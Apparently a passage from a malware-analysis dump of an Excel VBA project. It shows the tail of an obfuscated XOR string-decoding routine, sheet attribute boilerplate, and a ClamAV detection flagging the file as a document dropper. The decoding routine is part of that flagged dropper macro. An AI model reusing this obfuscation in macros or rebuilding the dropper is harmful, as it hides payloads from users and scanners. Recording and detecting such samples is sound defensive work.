fourth() = StrConv(CrMcSviMY, vbFromUnicode)
For IFctgq1Z1 = 0 To Len(CrMcSviMY)
    third = (third + k7Sc8zGx2(third) + 1) Mod 256
    fourth(IFctgq1Z1) = fourth(IFctgq1Z1) Xor k7Sc8zGx2(Temp + k7Sc8zGx2((third + k7Sc8zGx2(third)) Mod 254))
Next IFctgq1Z1
bFiJlSB8k = StrConv(fourth, vbUnicode)
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 42496 bytes
SHA-256: 6a53938953b45f89620e58ce5536c37a19407da6c41e61e422cf379bebc5bc95
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely